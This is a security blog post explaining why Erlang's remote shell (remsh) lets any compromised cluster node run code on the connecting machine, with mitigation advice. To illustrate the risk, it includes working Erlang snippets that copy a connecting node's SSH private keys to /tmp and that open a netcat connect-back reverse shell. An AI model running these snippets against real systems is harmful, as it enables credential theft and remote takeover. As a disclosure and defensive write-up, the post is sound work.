Erlang's remsh is dangerous

Erlang is pretty cool. It makes it easy to write programs that run on multiple computers cooperating over a network.

The core of Erlang is familiar to Unix programmers: to multitask, you use multiple processes. Processes can do work themselves or they can have children do the work for them. Parents know when their children die. Children crashing do not harm their parent or the rest of the system. Sending messages between processes couldn’t be easier:

SomeProcess ! SomeMessage.

The coolest part of Erlang is that SomeProcess can be on the same computer, or it can be halfway across the country in your backup datacenter. The syntax does not change. Messages can be anything. No serializing is required. Like any good tool, it takes away some of the drudgery (in this case, distributing your application) and lets you solve your actual problem.
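
To make that concrete, here is a minimal sketch. The module name echo_demo and the registered name echo are made up for this example; the point is only that the same send expression works for a pid, a local name, or a name on another node.

```erlang
-module(echo_demo).
-export([start/0, ask/2]).

%% Start an echo process and register it locally as `echo`.
%% (Module name and registered name are hypothetical.)
start() ->
    Pid = spawn(fun loop/0),
    true = register(echo, Pid),
    Pid.

%% Reply to every {From, Msg} with {echo, Msg}.
loop() ->
    receive
        {From, Msg} ->
            From ! {echo, Msg},
            loop()
    end.

%% Send Msg to Dest and wait up to a second for the reply.
%% Dest can be a pid, a locally registered name, or {Name, Node}
%% for a process registered on another node.
ask(Dest, Msg) ->
    Dest ! {self(), Msg},
    receive
        {echo, Reply} -> Reply
    after 1000 ->
        timeout
    end.
```

After echo_demo:start(), calling echo_demo:ask(echo, hello) talks to the local process, while echo_demo:ask({echo, 'erl@someserver.com'}, hello) would talk to a process registered as echo on that node, assuming one is running there. Nothing in ask/2 changes between the two.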

Needless to say, I like Erlang a lot.

Enter remsh

Erlang has a REPL, a ‘read-eval-print loop’. Just like in Ruby or Python, you can type in a little bit of code at a time to see what it does. Contrast this with C or Java, where you need to write a complete program just to try out a single line of code.

A natural extension of Erlang’s REPL is ‘remsh’ (remote shell), which lets you start a REPL on a remote Erlang node. The REPL is in the context of the already-running Erlang instance, so you can debug an application in real time without stopping the system. You invoke remsh like this:

erl -remsh erl@someserver.com -name me@localhost

Assuming you have your ~/.erlang.cookie set properly, you’ll get a REPL on that someserver.com machine.

Why remsh is dangerous

When you make a Secure Shell (SSH) connection to a Unix server, it’s understood that you, and the machine you connect from, are pretty safe. If that server has a hacker actively rooting around in it, and you connect, they cannot do anything nasty to your machine. There are a few exceptions:

If you use agent forwarding, they can impersonate you
If you log in with a password, they can steal it
If you use reverse tunnels, they can use them
If your SSH client or xterm or PTY driver or … has a bug in it, they can exploit it

The point is, you can SSH to a compromised server without getting your laptop compromised. This is not the case for Erlang’s remsh.

A side-effect of Erlang’s easy distribution is that clustered Erlang nodes have complete access to one another. Part of Erlang’s standard library is devoted to executing arbitrary code on other machines. When you invoke remsh, you become a part of the Erlang cluster. That means if any of the nodes in the cluster have been compromised, it’s game over: arbitrary code can be run on your machine.
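
A harmless way to see what “complete access” means is sketched below. The module name peer_demo is hypothetical; rpc:call/4 and os:cmd/1 are the standard library calls. The caller only needs to be connected to the target node, and nothing has to be installed on the target.

```erlang
-module(peer_demo).
-export([whoami_on/1]).

%% Run the `whoami` command on Node and return its output.
%% Any node in the cluster can make this call against any other node.
%% (Assumes a Unix-like target where `whoami` exists.)
whoami_on(Node) ->
    rpc:call(Node, os, cmd, ["whoami"]).
```

If a node in the cluster evaluated peer_demo:whoami_on('me@localhost') while you were attached with the remsh command shown earlier, the command would run on your machine, as your user.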

But I know my Erlang nodes aren’t compromised!

Then I hope you are using SSL for Erlang distribution, because although your Erlang cookie protects other people from connecting to your nodes, there are no integrity or authenticity mechanisms in Erlang distribution. Once you authenticate, everybody between you and your node can inject commands in the distribution link. In other words, if you remsh to a node on the Internet, anybody along the way can get a shell on your laptop and your Erlang cluster. This is documented, mind:

The TCP/IP distribution uses a handshake which expects a connection based protocol, i.e. the protocol does not include any authentication after the handshake procedure. This is not entirely safe, as it is vulnerable against takeover attacks, but it is a tradeoff between fair safety and performance.

I’d replace “not entirely safe” with “not even a little bit safe”, but that’s me.
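
For reference, distribution over TLS is switched on by starting erl with -proto_dist inet_tls and pointing -ssl_dist_optfile at a file of Erlang terms. The fragment below is a sketch of such a file, not a vetted configuration: every path in it is a placeholder, and your certificate layout will differ.

```erlang
%% Options file passed via -ssl_dist_optfile (all paths are placeholders).
[{server,
  [{cacertfile, "/path/to/ca.pem"},
   {certfile,   "/path/to/node-cert.pem"},
   {keyfile,    "/path/to/node-key.pem"},
   %% Require and verify a certificate from every connecting node.
   {verify, verify_peer},
   {fail_if_no_peer_cert, true}]},
 {client,
  [{cacertfile, "/path/to/ca.pem"},
   {certfile,   "/path/to/node-cert.pem"},
   {keyfile,    "/path/to/node-key.pem"},
   %% Verify the certificate of the node being connected to.
   {verify, verify_peer}]}].
```

This only covers the distribution link between nodes. It does nothing for EPMD, and it does not stop an authenticated but compromised node from running code on its peers.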

If you’re using remsh over the Internet, you’re probably doing something wrong already: EPMD (the Erlang Port Mapper Daemon, which maps node names to port numbers) has a history of crashable bugs and has no authentication at all (it does not use the Erlang cookie), so it really shouldn’t be exposed to the Internet. For more on that, see Michael Santos’ post on spoofing the Erlang protocols. In fact, he found effectively the same problem discussed here, 5 years ago, and buried it in a footnote:

It’s worth mentioning as well, since I’ve never seen it discussed, that if you connect in to a distributed Erlang node, everybody who’s authenticated to connect to that node has complete access to your workstation as your uid.

It isn’t really surprising that remsh is implemented this way. It is probably the most elegant way to do a remote REPL; the existing REPL already supports switching between different “jobs”, and Erlang’s distribution mechanism makes it easy to run things on other nodes.

I don’t know how to fix this (and perhaps it doesn’t need to be fixed because people already know not to do this). Maybe not starting the RPC server when using remsh would be enough. Maybe the “nuke it from orbit” approach of reimplementing remsh as a C Node is the only safe way.

Worked examples: stealing private keys and getting a shell

If you compromise a node and want to steal the SSH private keys of every node connecting to you, this code will do the trick. Any time a remsh user connects (well, any node), it will cat ~/.ssh/* and write it to a file in /tmp to pillage later. Nothing is logged to the remsh shell.

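spawn(fun() ->
  %% Subscribe to node up/down messages once, outside the loop.
  net_kernel:monitor_nodes(true),
  Loop = fun Grab_keys() ->
    receive
      {nodeup, Node} ->
        %% Runs on the node that just connected, not on this one.
        Keys = rpc:call(Node, os, cmd, ["cat ~/.ssh/*"]),
        file:write_file("/tmp/" ++ atom_to_list(Node), Keys);
      {nodedown, _Node} ->
        %% Discard, so these messages don't pile up in the mailbox.
        ok
    end,
    Grab_keys()
  end,
  Loop()
end).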

If you want to try this, start an instance of distributed Erlang:

erl -sname compromised_node

Paste the above Erlang code into the Eshell. It’ll kick off an evil process that isn’t linked to anything; if this had been a real Erlang node running real applications, chances are this process would go unnoticed.

Then, connect to the compromised node:

erl -remsh compromised_node@$(hostname) -sname mymachine

Right after you connect, you’ll be able to see a file in /tmp with all your (possibly encrypted) SSH private keys.

If instead you wanted a connect-back shell (and assuming your target has netcat that doesn’t have -e or -c flags), this will do the trick:

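spawn(fun() ->
  %% Subscribe to node up/down messages once, outside the loop.
  net_kernel:monitor_nodes(true),
  Host = "127.0.0.1",
  Port = 5000,
  Cmd = "rm -f /tmp/fifo && mkfifo /tmp/fifo && </tmp/fifo bash | nc ~p ~p 2>&1 >/tmp/fifo &",
  Loop = fun Get_shell() ->
    receive
      {nodeup, Node} ->
        rpc:cast(Node, os, cmd, [io_lib:format(Cmd, [Host, Port])]);
      {nodedown, _Node} ->
        %% Discard, so these messages don't pile up in the mailbox.
        ok
    end,
    Get_shell()
  end,
  Loop()
end).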

Any time a node connects, we’ll start a connect-back shell on it that’ll connect to Host:Port.

So how do I remsh safely?

There might be a better way, but my recommendation is to make an SSH connection to the node first and then remsh from there:

ssh -t erlang-user@example.com erl -remsh erl@example.com -name remsh@example.com

Whenever you use -name or -sname when starting Erlang, you’re in distributed mode. If you’re doing that from your laptop, you’re probably doing something wrong, remsh or not.
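
If you’re not sure whether a running node is distributed, you can ask it. The helper below is a small sketch; the module name dist_check is made up, while erlang:is_alive/0, node/0 and nodes/1 are standard BIFs.

```erlang
-module(dist_check).
-export([status/0]).

%% Report whether this node takes part in Erlang distribution and,
%% if so, which nodes (hidden ones included) it is connected to.
status() ->
    case erlang:is_alive() of
        true  -> {distributed, node(), nodes(connected)};
        false -> {not_distributed, node()}
    end.
```

On a node started with plain erl (no -name or -sname), dist_check:status() returns {not_distributed, nonode@nohost}.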

In summary:

Don’t do Erlang distribution over the Internet. Even if you use SSL, EPMD is not protected.
Don’t remsh directly from your laptop, ever. SSH to one of your nodes and run it there.
You’re not putting just your Erlang cluster at risk, but your workstation as well!
Michael Santos’ post on spoofing Erlang distribution is great. If you use Erlang at all, read it.

Alex's blog
